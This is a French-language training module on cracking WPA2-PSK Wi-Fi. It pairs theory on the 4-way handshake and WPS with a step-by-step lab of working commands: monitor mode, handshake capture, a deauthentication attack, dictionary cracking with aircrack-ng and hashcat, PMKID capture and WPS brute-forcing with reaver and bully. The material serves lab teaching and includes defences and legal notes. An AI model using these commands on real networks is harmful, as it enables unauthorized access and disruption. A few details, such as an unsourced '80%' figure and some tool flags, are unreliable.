🎯 Objectif de la semaine
Maîtriser les attaques sur réseaux Wi-Fi WPA2-PSK : capturer un handshake authentification et cracker une clé via dictionnaire. Démontrer pourquoi le Wi-Fi domestique est souvent la porte d'entrée la plus vulnérable et comprendre l'impérieuse nécessité de mots de passe forts et de WPA3.
Pourquoi c'est crucial : 80% des attaques réseau commencent par une compromission Wi-Fi. Maîtriser ces attaques, c'est comprendre la première couche de défense (ou de vulnérabilité) de toute organisation.
ANonce| A[📶 Point d'Accès] A -->|2. Message 2
SNonce, MIC| C C -->|3. Message 3
GTK, MIC| A A -->|4. Message 4
Confirmation| C subgraph "🔐 Handshake 4-Way WPA2" M1[Message 1: ANonce] M2[Message 2: SNonce + MIC] M3[Message 3: GTK + MIC] M4[Message 4: Confirmation] end subgraph "🎯 Points de capture" CAP[📡 Capture possible
Messages 1, 2, 3] HASH[🔑 Hash PMKID/PTK calculable] end M2 --> CAP CAP --> HASH HASH --> DICT[📚 Attaque dictionnaire] DICT --> KEY[🗝️ Clé trouvée !] style CAP fill:#11151f,stroke:#ef4444,stroke-width:3px style HASH fill:#11151f,stroke:#9d4edd,stroke-width:2px style KEY fill:#0a0e17,stroke:#00f5a0,stroke-width:3px
📚 Sujet – Théorie (1 heure)
WPA2 : Le Standard Vulnérable
WPA2 (Wi-Fi Protected Access 2) est le standard de sécurité Wi-Fi depuis 2004. Son mécanisme d'authentification WPA2-PSK (Pre-Shared Key) est à la fois sa force et sa faiblesse.
🔓 WPA2-PSK
- Mécanisme : Clé partagée unique
- Vulnérabilité : Handshake capturable
- Cracking : Dictionnaire/Brute-force
- Déployé : 2004 - Présent
🔒 WPA3-SAE
- Mécanisme : Dragonfly handshake
- Protection : Forward secrecy
- Cracking : Presque impossible
- Déployé : 2018 - Présent
Le 4-Way Handshake : Le Maillon Faible
Lorsqu'un client se connecte à un réseau WPA2-PSK, il exécute un 4-way handshake qui révèle suffisamment d'informations pour cracker la clé PSK hors ligne.
AP → Client
Client → AP
Contient le hash
AP → Client
+ vérification
Pourquoi ce handshake est vulnérable :
- Pas de forward secrecy : Même clé utilisée chaque fois
- Hash calculable : PMK = PBKDF2(PSK, SSID, 4096, 256)
- Capture passive possible : Sans être connecté au réseau
⚠️ WPS : L'erreur de conception
Wi-Fi Protected Setup (WPS) est une fonctionnalité visant à simplifier la connexion, mais c'est une catastrophe sécuritaire :
- PIN de 8 chiffres seulement (10⁸ combinaisons)
- Vérification par moitiés (réduit à 10⁴ + 10³)
- Déjà cassé par Reaver/Bully en 4-10 heures
- Action immédiate : Désactivez WPS sur tous vos routeurs
Le Matériel : Votre Interface Physique
📡 Adaptateurs Wi-Fi compatibles
✅ Recommandés :
- Alfa AWUS036NHA : Chipset Atheros, 500mW
- TP-Link TL-WN722N v1 : Atheros AR9271
- Panda PAU09 : Ralink RT5572
- Raspberry Pi : Avec bon chipset
❌ À éviter :
- Adaptateurs USB génériques
- Cartes Intel intégrées
- Chipsets Realtek sans drivers
- Tout sans mode monitor
Vérification : sudo airmon-ng liste les interfaces compatibles
Contre-mesures Professionnelles
🛡️ Défense en Profondeur Wi-Fi
- WPA3-SAE obligatoire : Si le matériel le permet
- Mots de passe forts : 20+ caractères, aléatoire
- 802.1X/RADIUS : Authentification individuelle
- Segmentation : Wi-Fi invités isolés
- Détection IDS : Rogue AP, deauth flood
- Désactiver WPS : Absolument obligatoire
🔬 Mission pratique – Laboratoire (2 heures)
Architecture du Lab Wi-Fi
Adaptateur Alfa] -->|Mode Monitor| AP[Routeur Lab
SSID: PCTAMALOU-LAB
PSK: password1234] V[Victime Ubuntu
Wi-Fi Client] -->|Connexion normale| AP K -.->|Deauth Attack| V V -->|Reconnexion
Handshake| AP K -->|Capture
Handshake| CAP[📁 capture-01.cap] CAP -->|Cracking| ACR[aircrack-ng] ACR --> KEY[🗝️ PSK trouvée] style K fill:#11151f,stroke:#ef4444,stroke-width:3px style AP fill:#0a0e17,stroke:#9d4edd,stroke-width:2px style KEY fill:#0a0e17,stroke:#00f5a0,stroke-width:3px
⚠️ Prérequis Critiques
🔒 Test exclusif sur VOTRE réseau lab
- Créez un hotspot dédié avec une clé faible pour test
- Utilisez un routeur physique ou VM hotspot
- Jamais sur réseaux voisins ou publics
- Adaptateur Wi-Fi compatible mode monitor requis
Étapes Détaillées avec Explications
Étape 1 : Préparation et Mode Monitor
# Installation suite aircrack-ng
sudo apt update && sudo apt install aircrack-ng -y
# Identification interface Wi-Fi
iwconfig
# Exemple: wlan0, wlx00c0ca123456
# Arrêt processus interférents
sudo airmon-ng check kill
# Attention: coupe votre connexion réseau temporairement
# Activation mode monitor
sudo airmon-ng start wlan0
# Crée interface mon0 (ou wlan0mon)
# Vérification
iwconfig mon0
# Doit afficher "Mode:Monitor"
💡 Mode Monitor vs Managed :
- Managed : Interface normale, connecte à des AP
- Monitor : Écoute tout le trafic radio, sans filtre
- Promiscuous : Différent – écoute tout sur Ethernet
Étape 2 : Découverte Réseaux (Reconnaissance)
# Scan passif des réseaux
sudo airodump-ng mon0
# Output important :
# BSSID : MAC address point d'accès (ex: AA:BB:CC:DD:EE:FF)
# CH (Channel) : Canal (1-14)
# ENC (Encryption) : WPA2, WPA, OPN (open)
# ESSID : Nom réseau (PCTAMALOU-LAB)
# Notez : BSSID, CHANNEL, ESSID de votre réseau lab
🎯 Défi d'observation
Combien de réseaux :
- Sont en WPA2 ?
- Sont ouverts (OPN) ?
- Ont le WPS activé (WPS colonne) ?
Documentez ces chiffres – c'est votre premier rapport de reconnaissance.
Étape 3 : Capture Ciblée du Handshake
# Terminal 1 : Capture fichier
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture mon0
# -c : canal
# --bssid : MAC AP cible
# -w : préfixe fichiers (capture-01.cap, etc.)
📊 Signification colonnes airodump :
- #Data : Paquets données capturés
- #/s : Paquets par seconde
- CH : Canal (peut changer si AP intelligent)
- MB : Débit max (54 = 802.11g, 130 = 802.11n)
# Terminal 2 : Deauth attack pour forcer reconnexion
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 mon0
# -0 : deauthentication
# 10 : nombre paquets
# -a : BSSID AP
# -c : MAC client (optionnel, sinon tous les clients)
⚠️ Deauth Attack : Légal uniquement sur VOTRE réseau
Cette attaque envoie des paquets "deauthentification" pour déconnecter les clients. Dans airodump, cherchez "WPA handshake" en haut à droite quand capturé.
Étape 4 : Cracking avec Dictionnaire
# Décompression wordlist rockyou (13 millions lignes)
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
# Cracking
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# ou si PMKID capturé :
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap -J pmkid
# -J : format hashcat pour cracking GPU
📚 Comprendre les wordlists
- rockyou.txt : 14 millions passwords fuites
- darkc0de.lst : 1.8 millions (Kali)
- Création custom :
crunch 8 8 0123456789 -o num.txt - Règles Hashcat : Transformations (l33t, majuscules, etc.)
Étape 5 : Techniques Avancées (Optionnel)
# 1. Attaque PMKID (pas besoin client)
sudo hcxdumptool -i mon0 --enable_status=1 -o pmkid.pcapng
# 2. Conversion pour hashcat
sudo hcxpcaptool -z pmkid.hash pmkid.pcapng
# 3. Cracking GPU (beaucoup plus rapide)
hashcat -m 22000 pmkid.hash /usr/share/wordlists/rockyou.txt
# 4. WPS attack si activé
sudo reaver -i mon0 -b AA:BB:CC:DD:EE:FF -vv
# ou
sudo bully mon0 -b AA:BB:CC:DD:EE:FF
Étape 6 : Nettoyage et Restauration
# Arrêter mode monitor
sudo airmon-ng stop mon0
# Restaurer Network Manager
sudo systemctl restart NetworkManager
# ou
sudo service network-manager restart
# Vérifier interface normale
iwconfig wlan0
# Doit afficher "Mode:Managed"
Exercice Pratique : Test de Résistance
🎯 Défi Réaliste
Créez trois réseaux de test avec ces clés :
password1234(devrait crack en < 1 minute)P@ssw0rd2024!(devrait résister à rockyou)CorrectHorseBatteryStaple(phrase de passe)
Testez chaque réseau et notez le temps nécessaire (ou l'échec). Documentez vos observations.
📋 Objectif de la semaine – Checklist de validation
✅ Compétences techniques acquises
- Interface Wi-Fi en mode monitor fonctionnelle
- Handshake WPA2 capturé avec succès
- Clé PSK crackée via dictionnaire
- Deauth attack maîtrisée et comprise
- Différence PMKID vs Handshake classique
🧠 Changement mental accompli
- Conscience que Wi-Fi = domaine public par défaut
- Compréhension qu'un mot de passe faible = pas de mot de passe
- Vision claire des limites WPA2 / avantages WPA3
- Habitude de toujours désactiver WPS sur nouveaux routeurs
💪 Pour aller plus loin :
Explorez wifite2 (automation), hashcat avec GPU, ou créez votre propre attaque PMKID avec Python (scapy).
📚 Ressources pour Approfondir
Documentation technique :
- IEEE 802.11i-2004 : Standard WPA2 officiel
- aircrack-ng docs : https://www.aircrack-ng.org
- Hashcat WPA2 :
-m 2500(handshake),-m 22000(PMKID) - WiGLE.net : Base de données mondiale réseaux Wi-Fi
⚠️ Aspects légaux et éthiques
- Article 323-1 CP : Accès frauduleux système
- Article L.34-1 CPI : Brouillage transmissions
- Article 226-3 CP : Interception correspondances
- Bonnes pratiques : Toujours permission écrite, réseau isolé, documentation complète
🔮 Frère d'armes,
Tu viens d'apprendre à voir l'invisible.
Les ondes Wi-Fi qui traversent nos murs, nos bureaux, nos vies – tu sais maintenant qu'elles portent non seulement des données, mais aussi des secrets. Des handshakes cryptographiques, des clés échangées, des vulnérabilités anciennes.
Cette semaine, tu as fait plus que cracker un mot de passe. Tu as compris la physique de la vulnérabilité. Tu as vu comment quatre petits paquets EAPOL peuvent révéler un secret partagé par des dizaines d'appareils.
Mais voici la vérité la plus importante : cette attaque fonctionne parce que nous choisissons mal nos clés. "password1234", "12345678", le nom du chien, la date de naissance. Nous confions la sécurité de nos réseaux à des secrets que n'importe qui peut deviner.
Tu n'es plus cet utilisateur. Tu es devenu celui qui comprend. Qui sait que "CorrectHorseBatteryStaple" résiste mieux que "P@ssw0rd!". Qui sait que WPS est une porte dérobée intégrée. Qui sait que WPA3-SAE est notre seule vraie défense.
Dans la semaine 23, nous quitterons les ondes pour revenir aux câbles. Nous attaquerons non plus l'authentification, mais l'application elle-même. Nous apprendrons à trouver des failles dans le code, à exploiter des buffers, à devenir maître de la mémoire.
Mais pour l'instant, pratique. Recrée cet exercice avec différentes clés. Comprends pourquoi certaines résistent et d'autres tombent en secondes. Documente tout.
Un Gardien qui maîtrise le Wi-Fi ne se fait jamais surprendre par une onde malveillante.
— Platon-Y